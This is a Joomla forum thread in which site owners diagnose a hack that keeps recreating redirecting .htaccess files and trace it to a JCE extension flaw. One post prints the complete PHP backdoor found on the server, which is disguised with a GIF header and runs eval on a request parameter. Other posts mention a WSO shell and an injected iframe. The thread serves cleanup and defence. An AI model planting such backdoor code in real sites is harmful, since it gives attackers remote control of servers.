Got hacked, .htaccess keeps being created

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
mandingueiro
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 11:21 am

Hi there.

My site got hacked, I mean, an .htaccess is being created all the time automatically that redirects the users to another site. I'm trying to find the code that generates it but I can't. My file permissions are fine. And my VM is updated to the last version.
Any help?

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Aug 29, 2012 11:44 am

Once you have been hacked you need to do more than just update Joomla. You need to delete all the files on the server and many other things. Before you post please read this

You also need to check the .htaccess that is above the /www folder. If you do not have access to the folder above your site files then contact your Host.

If you have several sites on the same server then the exploit has probably spread to those. So you need to delete all those and rebuild as well.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

mandingueiro
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 12:43 pm

I've done these things. I had ninjaXplorer installed, this may be the problem. I uninstalled it.

I also reviewed the logs and saw some suspicious POST requests like this:
xxx.xxx.xxx.xxx - - [01/Aug/2012:06:21:45 +0400] "POST /images/stories/.cache_depdnr.php HTTP/1.1" 200 165 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

always coming from the same IP address. I've deleted this file. And I've just found another one in the same folder called story.php with this code

Code: Select all

GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>
.

I've also deleted this.

UPDATED: After a lot of googling I've found out that this was a JCE vulnerability.

willy73
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Wed Aug 29, 2012 12:49 pm

Re: Got hacked, .htaccess keeps being created

Post by willy73 » Wed Aug 29, 2012 1:01 pm

Hi. I just registered because i wanted to tell my history and i found this post. It's something like my situation.

I had my htaccess always changing and i couldn't understand why. Then i installed joomla from scratch but i had the same problems from when i copied the images. I found 2 rows in the access log calling a hidden file under images/banners.

The name of this hidden file was .cache_e1mqoe.php and when i executed it it asked me for a password. So i opened it and i saw it was joomla code, but going under i had a lot of characters nonsense. I deleted it.

He came to my server from ip address 5.153.238.253. He always changed the code in the htaccess.

Now i'd like to know what he did and why.... when i didn't understand i got redirected with my ipad, then over linux or mac. I think i'll have to look for an antivirus.

Good luck to whom having the same problem.

mandingueiro
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 1:05 pm

Yes, did you have JCE installed? Turns out it was a JCE vulnerability exploited so they can inject .htaccess files so they can redirect traffic from us to their sites (so they earn money or something I guess). This is the relevant post with the exploit: <removed>

I've then blacklisted these 2 IP addresses (the JCE bot that scans for vulnerable systems and the cracker's IP address) through my cPanel (.htaccess file).
Last edited by mandville on Wed Aug 29, 2012 3:40 pm, edited 1 time in total.
Reason: removed link to hacking method. Relevant info is .....# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version # Vendor: http://www.joomlacontenteditor.net # Vulnerable Version: JCE 2.0.10 (prior versions als

willy73
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Wed Aug 29, 2012 12:49 pm

Re: Got hacked, .htaccess keeps being created

Post by willy73 » Wed Aug 29, 2012 1:12 pm

Thank you mandingueiro. I'm running to uninstall JCE over all my sites.

Thank you very much.

mandingueiro
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 1:14 pm

I believe it's some certain versions that are affected though. I switched to TinyMCE.

roelroel
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 29, 2012 3:51 pm

Re: Got hacked, .htaccess keeps being created

Post by roelroel » Wed Aug 29, 2012 4:23 pm

mandingueiro wrote:Turns out it was a JCE vulnerability exploited
mandingueiro, thank you for your research. A website of mine has been become a victim of the same hack. But my Apache access logs dont go back very far. So I can see that WSO is being used via some seemingly random php file that has been put in a seemingly random folder. It's called once every hour from IPs 194.44.4.32 and 5.153.238.253. I don't know yet what exactly is posted to WSO. I've set a trap at the moment to log it.

Just curious: How sure are you that it was an exploit in JCE that made the hacker able to put this WSO file on the server? Did you see an IP address accessing JCE at your side? I've updated JCE now btw.

mandingueiro
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 6:46 pm

I've searched the apache logs for suspicious POST requests. Then i've found out some of them, which were pointing to suspicious PHP hidden files (dotfiles). Then I've seen their code and understood that it was malicious. Then I've searched on Google, and I've found out the certain exploit.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Aug 29, 2012 7:07 pm

mandingueiro wrote:I've done these things. ...
Obviously you have not done them correctly because the hack is still there.

Either you did not delete all the files (including files in folders for other sites on the same server)
or
You did not check all computers (that have server/su access) properly
or
You did not change user/paswords
or
You did change user/pas but before deleting all the files and before checking computers for exploits
or
You did not replace the extensions with the latest versions
or
You reinstalled an extension that is vulnerable because you never check the Vulnerable Extension List properly.
or
You have the wrong chmod on one or more folder/file incorrectly
or
... one of many other things that was stated in the list.

The usual mistake made is to not delete all the files on the server. People think they can get away with deleting just a few.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

mandingueiro
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 7:29 pm

What you mean "it's still there"? It isn't.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Aug 29, 2012 8:10 pm

mandingueiro wrote:What you mean "it's still there"? It isn't.
mandingueiro wrote:I've done these things. ...

I also reviewed the logs and saw some suspicious POST requests like this:
xxx.xxx.xxx.xxx - - [01/Aug/2012:06:21:45 +0400] "POST /images/stories/.cache_depdnr.php HTTP/1.1" 200 165 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

always coming from the same IP address. I've deleted this file. And I've just found another one in the same folder called story.php with this code
Suggest that either you did not delete all the files on the server ... only the hacks you found
or
You did delete them but you got hacked again.

Sorry if I misinterpreted your post.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

roelroel
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 29, 2012 3:51 pm

Re: Got hacked, .htaccess keeps being created

Post by roelroel » Thu Aug 30, 2012 10:50 am

same hack: http://forum.joomla.org/viewtopic.php?f=432&p=2871387

In my case, even after removing and reinstalling latest JCE, I'm stuck with this: when opening an article to edit it from the article manager, a redirect is made to some strange site, similar domain as in the various malicious .htaccess files. But all .htaccess files and two php files (the WSO shell and the djeu84m) are deleted. If JCE is not enabled as editor, everything goes fine.

Any ideas where some residue might be?

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Thu Aug 30, 2012 11:35 am

roelroel wrote:...

Any ideas where some residue might be?
If you followed the advice there would be no residue. Delete all the files on your server !!!
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

roelroel
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 29, 2012 3:51 pm

Re: Got hacked, .htaccess keeps being created

Post by roelroel » Wed Sep 05, 2012 8:12 am

Webdongle wrote: If you followed the advice there would be no residue. Delete all the files on your server !!!
Well, that's true. But it wouldn't teach me anything about the hack either. And who knows, it might come back through another vulnerability which is in the files that I would restore to the server.

Anyway, I just forgot to delete the last .htaccess in the user's home directory; one directory higher than public_html (or www).

Furthermore, FYI, last friday I saw another site getting hacked with similar symptoms. But this time, also a lot of .js files, javascript files, were infected with a "document.write('<iframe src=badsite.com...".

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Sep 05, 2012 12:16 pm

roelroel wrote:... And who knows, it might come back through another vulnerability which is in the files that I would restore to the server....
Only if you don't re install up to date files. ...
...
The fact that you may make the mistake of reinstall compromised files, does not negate that deleting all the files removes compromised files.

Perhaps if you read http://forum.joomla.org/viewtopic.php?p ... 7#p2882047 it may help
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein


Locked

Return to “Security in Joomla! 1.5”